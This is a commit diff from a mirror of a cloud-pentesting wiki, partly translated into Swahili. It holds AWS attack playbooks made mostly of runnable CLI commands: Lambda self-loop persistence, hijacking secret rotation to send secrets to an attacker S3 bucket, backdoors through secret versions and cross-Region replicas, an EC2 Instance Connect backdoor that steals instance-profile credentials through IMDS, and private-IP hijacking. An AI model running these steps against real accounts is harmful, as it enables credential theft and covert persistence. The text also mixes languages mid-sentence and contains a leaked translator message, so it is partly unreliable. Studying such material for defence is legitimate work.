gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-04-28 12:03:08 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-post-exploitation

Browse Source
This commit is contained in:
Translator
2025-10-23 13:12:25 +00:00
parent 3bb5199e4c
commit 9972d058bb
18 changed files with 485 additions and 424 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
searchindex.js
View File

File diff suppressed because one or more lines are too long

27
src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-async-self-loop-persistence.md
View File

@@ -1,10 +1,12 @@
# AWS - Lambda Async Self-Loop Persistence via Destinations + Recursion Allow
Matumizi mabaya ya Destinations asynchronous za Lambda pamoja na usanidi wa Recursion ili kufanya function ijirudishe-invoke kila mara bila mscheduler wa nje (hakuna EventBridge, cron, n.k.). Kwa default, Lambda inavunja loop za recursion, lakini kuweka recursion config kwa Allow kunaziwezesha tena. Destinations hufanya delivery upande wa service kwa async invokes, hivyo invoke moja ya kuanzisha inaunda chaneli ya heartbeat/backdoor isiyo na msimbo na ya siri. Kwa hiari fupisha kwa reserved concurrency ili kupunguza kelele.
{{#include ../../../../banners/hacktricks-training.md}}
Tumia Lambda asynchronous destinations pamoja na Recursion configuration kufanya function iite tena yenyewe kwa mfululizo bila scheduler wa nje (hakuna EventBridge, cron, n.k.). Kwa default, Lambda inasimamisha recursive loops, lakini kuweka recursion config kuwa Allow kunaweza kuziruhusu tena. Destinations hutekelezwa upande wa service kwa async invokes, hivyo seed invoke moja huunda channel ya kimya, isiyo na code — heartbeat/backdoor channel. Hiari: throttle kwa reserved concurrency ili kupunguza kelele.
Vidokezo
- Lambda haiwezi kuruhusu kusanidi function kuwa destination yake moja kwa moja. Tumia function alias kama destination na ruhusu execution role kui-invoke alias hiyo.
- Ruhusa za chini kabisa: uwezo wa kusoma/kusasisha event invoke config na recursion config za function lengwa, kuchapisha version na kusimamia alias, na kusasisha policy ya execution role ya function ili kuruhusu lambda:InvokeFunction kwenye alias.
- Lambda hairuhusu kusanidi function kuwa destination yake moja kwa moja. Tumia function alias kama destination na uruhusu execution role ku-invoke alias hiyo.
- Minimum permissions: ability to read/update the target functions event invoke config and recursion config, publish a version and manage an alias, and update the functions execution role policy to allow lambda:InvokeFunction on the alias.
## Mahitaji
- Region: us-east-1
@@ -19,7 +21,7 @@ Vidokezo
FN_ARN=$(aws lambda get-function --function-name "$TARGET_FN" --region $REGION --query Configuration.FunctionArn --output text)
aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION || true
```
2) Chapisha toleo na unda/sasisha alias (inayotumika kama destinisho la mwenyewe)
2) Chapisha toleo na unda/sasisha alias (inayotumika kama lengo la kujipeleka)
```
VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text)
if ! aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION >/dev/null 2>&1; then
@@ -29,7 +31,7 @@ aws lambda update-alias --function-name "$TARGET_FN" --name loop --function-vers
fi
ALIAS_ARN=$(aws lambda get-alias --function-name "$TARGET_FN" --name loop --region $REGION --query AliasArn --output text)
```
3) Ruhusu function execution role kuitisha alias (inahitajika na Lambda Destinations→Lambda)
3) Ruhusu cheo cha utekelezaji cha function kuitisha alias (inahitajika na Lambda Destinations→Lambda)
```
# Set this to the execution role name used by the target function
ROLE_NAME=<lambda-execution-role-name>
@@ -47,7 +49,7 @@ cat > /tmp/invoke-self-policy.json <<EOF
EOF
aws iam put-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --policy-document file:///tmp/invoke-self-policy.json --region $REGION
```
4) Sanidi async destination kwa alias (self via alias) na uzime retries
4) Sanidi async destination kwa alias (self via alias) na zima retries
```
aws lambda put-function-event-invoke-config \
--function-name "$TARGET_FN" \
@@ -58,27 +60,27 @@ aws lambda put-function-event-invoke-config \
# Verify
aws lambda get-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION --query DestinationConfig
```
5) Ruhusu mizunguko ya rekursivu
5) Ruhusu mizunguko ya kujirudia
```
aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Allow --region $REGION
aws lambda get-function-recursion-config --function-name "$TARGET_FN" --region $REGION
```
6) Chochea invoke moja asynchronous
6) Kuanzisha invoke moja isiyo ya sinkroni
```
aws lambda invoke --function-name "$TARGET_FN" --invocation-type Event /tmp/seed.json --region $REGION >/dev/null
```
7) Angalia miito zinazoendelea (mifano)
7) Chunguza miito endelevu (mifano)
```
# Recent logs (if the function logs each run)
aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 20 --region $REGION --query events[].timestamp --output text
# or check CloudWatch Metrics for Invocations increasing
```
8) Hiari: stealth throttle
8) Hiari stealth throttle
```
aws lambda put-function-concurrency --function-name "$TARGET_FN" --reserved-concurrent-executions 1 --region $REGION
```
## Usafishaji
Vunja loop na ondoa persistence.
Vunja mzunguko na ondoa persistence.
```
aws lambda put-function-recursion-config --function-name "$TARGET_FN" --recursive-loop Terminate --region $REGION
aws lambda delete-function-event-invoke-config --function-name "$TARGET_FN" --region $REGION || true
@@ -89,4 +91,5 @@ ROLE_NAME=<lambda-execution-role-name>
aws iam delete-role-policy --role-name "$ROLE_NAME" --policy-name allow-invoke-self --region $REGION || true
```
## Athari
- Async invoke moja husababisha Lambda kuji-invoke upya kwa uendelevu bila scheduler ya nje, ikiruhusu stealthy persistence/heartbeat. Reserved concurrency inaweza kupunguza kelele hadi warm execution moja.
- Single async invoke inasababisha Lambda kuji-invoke tena mara kwa mara bila scheduler wa nje, ikiruhusu stealthy persistence/heartbeat. Reserved concurrency inaweza kupunguza noise hadi single warm execution.
{{#include ../../../../banners/hacktricks-training.md}}

68
src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence/README.md
View File

@@ -4,21 +4,21 @@
## Secrets Manager
Kwa habari zaidi angalia:
For more info check:
{{#ref}}
../../aws-services/aws-secrets-manager-enum.md
{{#endref}}
### Kupitia Resource Policies
### Kupitia Sera za Rasilimali
Inawezekana **kutoa ruhusa za kufikia secrets kwa akaunti za nje** kupitia resource policies. Angalia [**Secrets Manager Privesc page**](../../aws-privilege-escalation/aws-secrets-manager-privesc/README.md) kwa maelezo zaidi. Kumbuka kwamba ili **access a secret**, akaunti ya nje pia itahitaji **access to the KMS key encrypting the secret**.
Inawezekana **kutoa upatikanaji wa siri kwa akaunti za nje** kupitia sera za rasilimali. Angalia [**Secrets Manager Privesc page**](../../aws-privilege-escalation/aws-secrets-manager-privesc/README.md) kwa maelezo zaidi. Kumbuka kwamba ili **kupata siri**, akaunti ya nje itahitaji pia **ufikiaji wa KMS key inayofanya encryption ya siri hiyo**.
### Kupitia Secrets Rotate Lambda
Ili **rotate secrets** kwa automatis, huitwa **Lambda** iliyosanifiwa. Ikiwa mshambuliaji angeweza **change** the **code** angeweza moja kwa moja **exfiltrate the new secret** kwake mwenyewe.
Ili **kupangilia upya siri** kiotomatiki, **Lambda** iliyosanifiwa inaitwa. Ikiwa mshambuliaji angeweza **kubadilisha** **code** angeweza moja kwa moja **exfiltrate the new secret** to himself.
Hivi ndivyo lambda code kwa kitendo kama hicho inaweza kuonekana:
This is how lambda code for such action could look like:
```python
import boto3
@@ -48,30 +48,28 @@ import string
password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
return password
```
{{#include ../../../../banners/hacktricks-training.md}}
### Badilisha Lambda ya rotation kuwa kazi inayodhibitiwa na mshambuliaji kupitia RotateSecret
### Badilisha rotation Lambda kuwa function inayodhibitiwa na mshambuliaji kupitia RotateSecret
Tumia vibaya `secretsmanager:RotateSecret` ili kurekebisha secret ili iende kwa rotation Lambda inayodhibitiwa na mshambuliaji na kusababisha rotation mara moja. Function haribifu hufanya exfiltration ya matoleo ya secret (AWSCURRENT/AWSPENDING) wakati wa hatua za rotation (createSecret/setSecret/testSecret/finishSecret) hadi sink ya mshambuliaji (kwa mfano, S3 au HTTP ya nje).
Tumia vibaya `secretsmanager:RotateSecret` ili kurebind secret kwa rotation Lambda inayodhibitiwa na mshambuliaji na kusababisha rotation ya papo hapo. Kazi hasidi inafanya exfiltrates versions za secret (AWSCURRENT/AWSPENDING) wakati wa hatua za rotation (createSecret/setSecret/testSecret/finishSecret) hadi attacker sink (mfano, S3 au external HTTP).
- Mahitaji
- Ruhusa: `secretsmanager:RotateSecret`, `lambda:InvokeFunction` kwa Lambda ya mshambuliaji, `iam:CreateRole/PassRole/PutRolePolicy` (au AttachRolePolicy) ili kuandaa execution role ya Lambda na ruhusa za `secretsmanager:GetSecretValue` na ikiwezekana `secretsmanager:PutSecretValue`, `secretsmanager:UpdateSecretVersionStage` (ili rotation iendelee kufanya kazi), KMS `kms:Decrypt` kwa KMS key ya secret, na `s3:PutObject` (au outbound egress) kwa exfiltration.
- Kitambulisho cha secret lengwa (`SecretId`) chenye rotation imewezeshwa au uwezo wa kuwezesha rotation.
- Idhini: `secretsmanager:RotateSecret`, `lambda:InvokeFunction` on the attacker Lambda, `iam:CreateRole/PassRole/PutRolePolicy` (or AttachRolePolicy) to provision the Lambda execution role with `secretsmanager:GetSecretValue` and preferably `secretsmanager:PutSecretValue`, `secretsmanager:UpdateSecretVersionStage` (so rotation keeps working), KMS `kms:Decrypt` for the secret KMS key, and `s3:PutObject` (or outbound egress) for exfiltration.
- Secret id lengwa (`SecretId`) na rotation imewezeshwa au uwezo wa kuwezesha rotation.
- Athari
- Mshambuliaji anapata thamani(za) secret bila kubadilisha code ya rotation ya halali. Tu usanidi wa rotation unabadilishwa ili kuashiria Lambda ya mshambuliaji. Ikiwa haitagunduliwa, rotations zilizopangwa za baadaye zitaendelea kumuita function ya mshambuliaji pia.
- Mshambuliaji anapata thamani(zi) za secret bila kubadilisha code halali ya rotation. Mabadiliko ni tu kwenye configuration ya rotation ili kuelekeza kwa Lambda ya mshambuliaji. Ikiwa hayataonekana, rotations zilizopangwa za baadaye zitaendelea kuitisha kazi ya mshambuliaji pia.
- Hatua za shambulio (CLI)
1) Andaa sink ya mshambuliaji na role ya Lambda
- Tengeneza S3 bucket kwa exfiltration na execution role inayothibitishwa na Lambda yenye ruhusa za kusoma secret na kuandika kwenye S3 (plus logs/KMS kama inahitajika).
2) Deploy Lambda ya mshambuliaji ambayo katika kila hatua ya rotation inapata thamani(za) secret na kuziandika kwenye S3. Mantiki ndogo ya rotation inaweza kunakili tu AWSCURRENT hadi AWSPENDING na kuikuza katika finishSecret ili huduma iendelee kuwa imara.
3) Rekebisha rotation na kusababisha
1) Andaa attacker sink na Lambda role
- Unda S3 bucket kwa exfiltration na execution role inayotegemewa na Lambda yenye idhini za kusoma secret na kuandika S3 (na logs/KMS kama inahitajika).
2) Deploy Lambda ya mshambuliaji ambayo kila hatua ya rotation inachukua thamani(zi) za secret na kuziandika S3. Logic ya rotation minimal inaweza tu kunakili AWSCURRENT hadi AWSPENDING na kuipromote katika finishSecret ili huduma iendelee kufanya kazi.
3) Rebind rotation na uitishe
- `aws secretsmanager rotate-secret --secret-id <SECRET_ARN> --rotation-lambda-arn <ATTACKER_LAMBDA_ARN> --rotation-rules '{"ScheduleExpression":"rate(10 days)"}' --rotate-immediately`
4) Thibitisha exfiltration kwa kuorodhesha prefix ya S3 kwa secret hiyo na kuchunguza artifacts za JSON.
5) (Hiari) Rudisha rotation Lambda ya asili ili kupunguza ugundaji.
4) Thibitisha exfiltration kwa kuorodhesha prefix ya S3 kwa secret hiyo na kukagua artifacts za JSON.
5) (Hiari) Rudisha Lambda ya rotation ya asili ili kupunguza kugunduliwa.
- Mfano wa Lambda ya mshambuliaji (Python) inayofanya exfiltration hadi S3
- Mazingira: `EXFIL_BUCKET=<bucket>`
- Mfano wa attacker Lambda (Python) exfiltrating to S3
- Environment: `EXFIL_BUCKET=<bucket>`
- Handler: `lambda_function.lambda_handler`
```python
import boto3, json, os, base64, datetime
@@ -100,14 +98,14 @@ write_s3(key, {'time': datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
```
### Version Stage Hijacking for Covert Persistence (custom stage + fast AWSCURRENT flip)
Abuse Secrets Manager version staging labels to plant an attacker-controlled secret version and keep it hidden under a custom stage (for example, `ATTACKER`) while production continues to use the original `AWSCURRENT`. At any moment, move `AWSCURRENT` to the attackers version to poison dependent workloads, then restore it to minimize detection. This provides stealthy backdoor persistence and rapid time-of-use manipulation without changing the secret name or rotation config.
Abuse Secrets Manager version staging labels ili kuweka toleo la secret linalodhibitiwa na mshambuliaji na kulificha chini ya custom stage (kwa mfano, `ATTACKER`) wakati production inaendelea kutumia asili ya `AWSCURRENT`. Wakati wowote, hamisha `AWSCURRENT` kwa toleo la mshambuliaji ili kuchafua workloads zinazotegemea, kisha urejeshe ili kupunguza uwezekano wa kugunduliwa. Hii inatoa stealthy backdoor persistence na udhibiti wa haraka wa time-of-use bila kubadilisha jina la secret au rotation config.
- Mahitaji
- Ruhusa: `secretsmanager:PutSecretValue`, `secretsmanager:UpdateSecretVersionStage`, `secretsmanager:DescribeSecret`, `secretsmanager:ListSecretVersionIds`, `secretsmanager:GetSecretValue` (for verification)
- Kitambulisho cha siri lengwa katika Region.
- Ruhusa: `secretsmanager:PutSecretValue`, `secretsmanager:UpdateSecretVersionStage`, `secretsmanager:DescribeSecret`, `secretsmanager:ListSecretVersionIds`, `secretsmanager:GetSecretValue` (kwa uhakikisho)
- ID ya secret lengwa katika Region.
- Athari
- Dumisha toleo lililofichwa, linalodhibitiwa na mshambuliaji la siri, na ugeuze kwa atomiki `AWSCURRENT` kwenda kwenye toleo hilo wakati wowote ulipohitajika, ukichochea chochote kinachotegemea kutatua jina hilo la siri. Ugeuzaji huo na urejeshaji wa haraka hupunguza uwezekano wa kugunduliwa huku ukiruhusu udanganyifu wa wakati-wa-matumizi.
- Hifadhi toleo lililofichwa, linalodhibitiwa na mshambuliaji la secret na kwa atomiki ibadilishe `AWSCURRENT` kwa hilo unapoagizwa, ukiaathiri yeyote anayetatua jina la secret sawa. Kubadili na urejesho wa haraka hupunguza nafasi ya kugunduliwa huku ikiruhusu kuathiriwa kwa time-of-use.
- Hatua za mashambulizi (CLI)
- Maandalizi
@@ -169,17 +167,17 @@ aws secretsmanager update-secret-version-stage \
### Cross-Region Replica Promotion Backdoor (replicate ➜ promote ➜ permissive policy)
Tumia vibaya Secrets Manager multi-Region replication kuunda replica ya target secret katika Region yenye ufuatiliaji mdogo, uiencrypt kwa KMS key inayodhibitiwa na mshambuliaji katika Region hiyo, kisha promote replica kuwa standalone secret na kuambatisha permissive resource policy inayompa mshambuliaji read access. Original secret katika primary Region inabaki isiyobadilika, ikitoa njia ya kudumu, ya kimya (stealthy) ya kupata thamani ya secret kupitia replica iliyopromote huku ikizunguka vikwazo vya KMS/policy kwenye primary.
Abuse Secrets Manager multi-Region replication to create a replica of a target secret into a less-monitored Region, encrypt it with an attacker-controlled KMS key in that Region, then promote the replica to a standalone secret and attach a permissive resource policy granting attacker read access. The original secret in the primary Region remains unchanged, yielding durable, stealthy access to the secret value via the promoted replica while bypassing KMS/policy constraints on the primary.
- Mahitaji
- Permissions: `secretsmanager:ReplicateSecretToRegions`, `secretsmanager:StopReplicationToReplica`, `secretsmanager:PutResourcePolicy`, `secretsmanager:GetResourcePolicy`, `secretsmanager:DescribeSecret`.
- In the replica Region: `kms:CreateKey`, `kms:CreateAlias`, `kms:CreateGrant` (or `kms:PutKeyPolicy`) to allow the attacker principal `kms:Decrypt`.
- An attacker principal (user/role) to receive read access to the promoted secret.
- Ruhusa: `secretsmanager:ReplicateSecretToRegions`, `secretsmanager:StopReplicationToReplica`, `secretsmanager:PutResourcePolicy`, `secretsmanager:GetResourcePolicy`, `secretsmanager:DescribeSecret`.
- Katika Region ya nakala: `kms:CreateKey`, `kms:CreateAlias`, `kms:CreateGrant` (or `kms:PutKeyPolicy`) ili kumruhusu principal wa mshambulizi `kms:Decrypt`.
- Principal wa mshambulizi (mtumiaji/cheo) ili kupokea haki ya kusoma kwenye siri iliyopromote.
- Athari
- Persistent cross-Region access path to the secret value through a standalone replica under an attacker-controlled KMS CMK and permissive resource policy. The primary secret in the original Region is untouched.
- Njia ya kudumu ya kupata thamani ya siri kuvuka-Region kupitia nakala huru iliyo chini ya KMS CMK inayodhibitiwa na mshambulizi na resource policy yenye ruhusa. Siri ya msingi katika Region ya asili haijabadilishwa.
- Ushambulizi (CLI)
- Attack (CLI)
- Vars
```bash
export R1=<primary-region> # e.g., us-east-1
@@ -188,7 +186,7 @@ export SECRET_ID=<secret name or ARN in R1>
export ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
export ATTACKER_ARN=<arn:aws:iam::<ACCOUNT_ID>:user/<attacker> or role>
```
1) Unda KMS key inayodhibitiwa na mshambulizi katika replica Region
1) Unda KMS key inayodhibitiwa na mshambuliaji katika replica Region
```bash
cat > /tmp/kms_policy.json <<'JSON'
{"Version":"2012-10-17","Statement":[
@@ -201,20 +199,20 @@ aws kms create-alias --region "$R2" --alias-name alias/attacker-sm --target-key-
# Allow attacker to decrypt via a grant (or use PutKeyPolicy to add the principal)
aws kms create-grant --region "$R2" --key-id "$KMS_KEY_ID" --grantee-principal "$ATTACKER_ARN" --operations Decrypt DescribeKey
```
2) Nakilisha secret kwenye R2 kwa kutumia attacker KMS key
2) Nakili siri kwa R2 kwa kutumia attacker KMS key
```bash
aws secretsmanager replicate-secret-to-regions --region "$R1" --secret-id "$SECRET_ID" \
--add-replica-regions Region=$R2,KmsKeyId=alias/attacker-sm --force-overwrite-replica-secret
aws secretsmanager describe-secret --region "$R1" --secret-id "$SECRET_ID" | jq '.ReplicationStatus'
```
3) Kuinua replica kuwa standalone katika R2
3) Inua nakala kuwa pekee katika R2
```bash
# Use the secret name (same across Regions)
NAME=$(aws secretsmanager describe-secret --region "$R1" --secret-id "$SECRET_ID" --query Name --output text)
aws secretsmanager stop-replication-to-replica --region "$R2" --secret-id "$NAME"
aws secretsmanager describe-secret --region "$R2" --secret-id "$NAME"
```
4) Ambatisha sera ya rasilimali yenye kuruhusu kwenye secret peke yake katika R2
4) Ambatisha permissive resource policy kwenye standalone secret katika R2
```bash
cat > /tmp/replica_policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AttackerRead","Effect":"Allow","Principal":{"AWS":"${ATTACKER_ARN}"},"Action":["secretsmanager:GetSecretValue"],"Resource":"*"}]}
@@ -227,4 +225,4 @@ aws secretsmanager get-resource-policy --region "$R2" --secret-id "$NAME"
# Configure attacker credentials and read
aws secretsmanager get-secret-value --region "$R2" --secret-id "$NAME" --query SecretString --output text
```
{{#include ../../../../banners/hacktricks-training.md}}

31
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md
View File

@@ -2,21 +2,21 @@
{{#include ../../../../banners/hacktricks-training.md}}
Tumia vibaya EC2 Instance Connect Endpoint (EIC Endpoint) kupata ufikiaji wa SSH unaoingia kwenye instances za EC2 za ndani (bila public IP/bastion) kwa:
Kutumia vibaya EC2 Instance Connect Endpoint (EIC Endpoint) kupata ufikiaji wa SSH wa incoming kwenye private EC2 instances (bila IP ya umma/bastion) kwa:
- Kuunda EIC Endpoint ndani ya subnet lengwa
- Kuruhusu SSH inayoingia kwenye SG lengwa kutoka SG ya EIC Endpoint
- Kuingiza ufunguo mfupi wa SSH wa umma (unakubalika kwa takriban 60 sekunde) kwa `ec2-instance-connect:SendSSHPublicKey`
- Kufungua tuneli ya EIC na pivoting hadi kwenye instance ili kuiba instance profile credentials kutoka IMDS
- Kuruhusu inbound SSH kwenye SG lengwa kutoka SG ya EIC Endpoint
- Kuingiza ephemeral SSH public key (inayodumu kwa muda mfupi, takriban ~60 seconds) kwa kutumia `ec2-instance-connect:SendSSHPublicKey`
- Kufungua EIC tunnel na kupivota hadi instance ili kuiba instance profile credentials kutoka IMDS
Impact: njia ya kificho ya upatikanaji wa mbali hadi instances za EC2 za ndani ambayo inapita kando ya bastions na vizingiti vya public IP. Mshambuliaji anaweza kuchukua instance profile na kufanya shughuli ndani ya account.
Impact: njia ya siri ya ufikiaji wa mbali kwenye private EC2 instances inayopitisha bastions na vikwazo vya IP za umma. Mshambuliaji anaweza kuchukua instance profile na kufanya shughuli ndani ya akaunti.
## Mahitaji
- Idhini za:
## Requirements
- Ruhusa za:
- `ec2:CreateInstanceConnectEndpoint`, `ec2:Describe*`, `ec2:AuthorizeSecurityGroupIngress`
- `ec2-instance-connect:SendSSHPublicKey`, `ec2-instance-connect:OpenTunnel`
- Instance ya Linux lengwa yenye server ya SSH na EC2 Instance Connect imewezeshwa (Amazon Linux 2 au Ubuntu 20.04+). Watumiaji chaguo-msingi: `ec2-user` (AL2) au `ubuntu` (Ubuntu).
- Instance ya Linux lengwa yenye SSH server na EC2 Instance Connect imewezeshwa (Amazon Linux 2 au Ubuntu 20.04+). Watumiaji wa default: `ec2-user` (AL2) au `ubuntu` (Ubuntu).
## Vigezo
## Variables
```bash
export REGION=us-east-1
export INSTANCE_ID=<i-xxxxxxxxxxxx>
@@ -45,13 +45,13 @@ grep -q 'create-complete' EIC_STATE && break
sleep 5
done
```
## Ruhusu trafiki kutoka EIC Endpoint kwenda target instance
## Ruhusu trafiki kutoka EIC Endpoint hadi target instance
```bash
aws ec2 authorize-security-group-ingress \
--group-id "$TARGET_SG_ID" --protocol tcp --port 22 \
--source-group "$ENDPOINT_SG_ID" --region "$REGION" || true
```
## Ingiza SSH key ya muda mfupi na fungua tunnel
## Ingiza ufunguo wa SSH wa muda mfupi na fungua tunnel
```bash
# Generate throwaway key
ssh-keygen -t ed25519 -f /tmp/eic -N ''
@@ -73,13 +73,13 @@ TUN_PID=$!; sleep 2
# SSH via the tunnel (within the 60s window)
ssh -i /tmp/eic -p 2222 "$OS_USER"@127.0.0.1 -o StrictHostKeyChecking=no
```
## Post-exploitation uthibitisho (steal instance profile credentials)
## Post-exploitation proof (kumwibia instance profile credentials)
```bash
# From the shell inside the instance
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ | tee ROLE
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$(cat ROLE)
```
Tafadhali tuma maudhui ya faili 'src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md' ili niweze kuyatafsiri kwa Kiswahili kwa kufuata miongozo uliyotoa.
I don't have the file contents. Please paste the markdown/text from src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ec2-instance-connect-endpoint-backdoor.md and I will translate it to Swahili following your rules.
```json
{
"Code": "Success",
@@ -89,7 +89,7 @@ Tafadhali tuma maudhui ya faili 'src/pentesting-cloud/aws-security/aws-post-expl
"Expiration": "2025-10-08T04:09:52Z"
}
```
Tumia creds zilizoibiwa kwenye mfumo wa ndani kuthibitisha utambulisho:
Tumia creds zilizoibiwa kwa mashine ya ndani ili kuthibitisha utambulisho:
```bash
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
@@ -109,5 +109,6 @@ aws ec2 delete-instance-connect-endpoint \
--instance-connect-endpoint-id "$(cat EIC_ID)" --region "$REGION"
```
> Vidokezo
> - Ufunguo wa SSH uliowekwa ni halali tu kwa ~60 sekunde; tuma ufunguo mara tu kabla ya kufungua tunnel/SSH.
> - SSH key iliyowekwa ni halali tu kwa ~60 sekunde; tuma key hiyo mara moja kabla ya kufungua tunnel/SSH.
> - `OS_USER` inapaswa kuendana na AMI (kwa mfano, `ubuntu` kwa Ubuntu, `ec2-user` kwa Amazon Linux 2).
{{#include ../../../../banners/hacktricks-training.md}}

23
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-eni-secondary-ip-hijack.md
View File

@@ -2,11 +2,11 @@
{{#include ../../../../banners/hacktricks-training.md}}
Tumia vibaya `ec2:UnassignPrivateIpAddresses` na `ec2:AssignPrivateIpAddresses` kunyang'anya secondary private IP ya ENI ya mwathiriwa na kuihamisha kwenye ENI ya mshambuliaji katika subnet/AZ ile ile. Huduma nyingi za ndani na security groups zinaweka ufikiaji kwa IP maalum za ndani. Kwa kuhamisha anwani hiyo ya sekondari, mshambuliaji anajifanya kuwa mwenyeji anaeaminika kwa L3 na anaweza kufikia huduma zilizokuwa allowlisted.
Tumia vibaya `ec2:UnassignPrivateIpAddresses` na `ec2:AssignPrivateIpAddresses` kuiba secondary private IP ya ENI ya mwathiriwa na kuhamisha kwa ENI ya mwavamizi katika subnet/AZ ileile. Huduma nyingi za ndani na security groups huweka ufikiaji kwa private IP maalum. Kwa kuhamisha anwani hiyo ya secondary, mwavamizi anajifanya kama mwenyeji aliyeaminika kwa L3 na anaweza kufikia allowlisted services.
Prereqs:
- Permissions: `ec2:DescribeNetworkInterfaces`, `ec2:UnassignPrivateIpAddresses` on the victim ENI ARN, and `ec2:AssignPrivateIpAddresses` on the attacker ENI ARN.
- Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (primary cannot be unassigned).
- Ruhusa: `ec2:DescribeNetworkInterfaces`, `ec2:UnassignPrivateIpAddresses` kwenye ARN ya ENI ya mwathiriwa, na `ec2:AssignPrivateIpAddresses` kwenye ARN ya ENI ya mwavamizi.
- ENI zote mbili lazima ziwe katika subnet/AZ ileile. Anwani lengwa lazima iwe secondary IP (primary haiwezi kuondolewa).
Variables:
- REGION=us-east-1
@@ -16,24 +16,24 @@ Variables:
- PROTECTED_HOST=<private-dns-or-ip-of-protected-service>
Steps:
1) Pick a secondary IP from the victim ENI
1) Chagua secondary IP kutoka kwa ENI ya mwathiriwa
```bash
aws ec2 describe-network-interfaces --network-interface-ids $VICTIM_ENI --region $REGION --query NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress --output text | head -n1 | tee HIJACK_IP
export HIJACK_IP=$(cat HIJACK_IP)
```
2) Hakikisha host iliyolindwa inaruhusu IP hiyo pekee (idempotent). Ikiwa unatumia SG-to-SG rules badala yake, ruka.
2) Hakikisha protected host inaruhusu IP hiyo tu (idempotent). Ikiwa unatumia SG-to-SG rules badala yake, ruka.
```bash
aws ec2 authorize-security-group-ingress --group-id $PROTECTED_SG --protocol tcp --port 80 --cidr "$HIJACK_IP/32" --region $REGION || true
```
3) Misingi: kutoka kwenye attacker instance, ombi kwa PROTECTED_HOST linapaswa kushindwa bila chanzo kilichodanganywa (kwa mfano, kupitia SSM/SSH)
3) Msingi: kutoka kwenye instance ya mshambuliaji, ombi kwa PROTECTED_HOST inapaswa kushindikana bila chanzo kilichodanganywa (kwa mfano, kupitia SSM/SSH)
```bash
curl -sS --max-time 3 http://$PROTECTED_HOST || true
```
4) Ondoa secondary IP kutoka kwenye ENI ya mwathiriwa
4) Ondoa IP ya pili kutoka kwa ENI ya mwathiriwa
```bash
aws ec2 unassign-private-ip-addresses --network-interface-id $VICTIM_ENI --private-ip-addresses $HIJACK_IP --region $REGION
```
5) Tenga IP ile ile kwa attacker ENI (kwenye AWS CLI v1 ongeza `--allow-reassignment`)
5) Peana IP ile ile kwa attacker ENI (on AWS CLI v1 add `--allow-reassignment`)
```bash
aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI --private-ip-addresses $HIJACK_IP --region $REGION
```
@@ -41,10 +41,11 @@ aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI --pri
```bash
aws ec2 describe-network-interfaces --network-interface-ids $ATTACKER_ENI --region $REGION --query NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress --output text | grep -w $HIJACK_IP
```
7) Kutoka kwenye attacker instance, source-bind kwa hijacked IP ili kufikia protected host (hakikisha IP imewekwa kwenye OS; ikiwa haijawekwa, ongeza kwa `ip addr add $HIJACK_IP/<mask> dev eth0`)
7) Kutoka kwa attacker instance, source-bind kwenye hijacked IP ili kufikia protected host (hakikisha IP imewekwa kwenye OS; ikiwa siyo, iiongeze kwa `ip addr add $HIJACK_IP/<mask> dev eth0`)
```bash
curl --interface $HIJACK_IP -sS http://$PROTECTED_HOST -o /tmp/poc.out && head -c 80 /tmp/poc.out
```
## Athari
- Bypass IP allowlists na kuiga trusted hosts ndani ya VPC kwa kusogeza secondary private IPs kati ya ENIs katika subnet/AZ ileile.
- Fikia huduma za ndani ambazo zinakagua ufikiaji kwa specific source IPs, zikiruhusu lateral movement na upatikanaji wa data.
- Kupita kando allowlists za IP na kujiga mwenyeji aliyeaminika ndani ya VPC kwa kuhamisha secondary private IPs kati ya ENIs ndani ya subnet/AZ ile ile.
- Kufikia huduma za ndani ambazo zinazuia upatikanaji kwa source IPs maalum, hivyo kuwezesha lateral movement na upatikanaji wa data.
{{#include ../../../../banners/hacktricks-training.md}}

40
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation/README.md
View File

@@ -4,7 +4,7 @@
## ECR
Kwa taarifa zaidi angalia
Kwa maelezo zaidi angalia
{{#ref}}
../../aws-services/aws-ecr-enum.md
@@ -55,7 +55,7 @@ https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forens
### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage`
